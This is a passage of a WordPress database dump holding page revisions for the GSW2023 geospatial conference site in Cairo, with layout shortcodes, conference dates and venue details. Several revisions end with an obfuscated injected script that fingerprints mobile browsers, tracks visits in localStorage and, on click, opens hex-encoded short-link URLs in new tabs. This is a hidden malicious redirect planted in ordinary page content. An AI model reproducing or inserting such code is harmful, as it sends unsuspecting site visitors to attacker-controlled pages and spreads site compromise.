Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 21:03:32','2022-11-09 21:03:32','',3066,'https://gsw2023.com/?p=3228',0,'revision','',0),
(3229,1,'2022-11-09 21:06:42','2022-11-09 21:06:42','','about2','','inherit','open','closed','','about2','','','2022-11-09 21:06:42','2022-11-09 21:06:42','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/about2.jpg',0,'attachment','image/jpeg',0),
(3230,1,'2022-11-09 21:07:08','2022-11-09 21:07:08','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 21:07:08','2022-11-09 21:07:08','',3066,'https://gsw2023.com/?p=3230',0,'revision','',0),
(3231,1,'2022-11-09 21:11:13','2022-11-09 21:11:13','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and 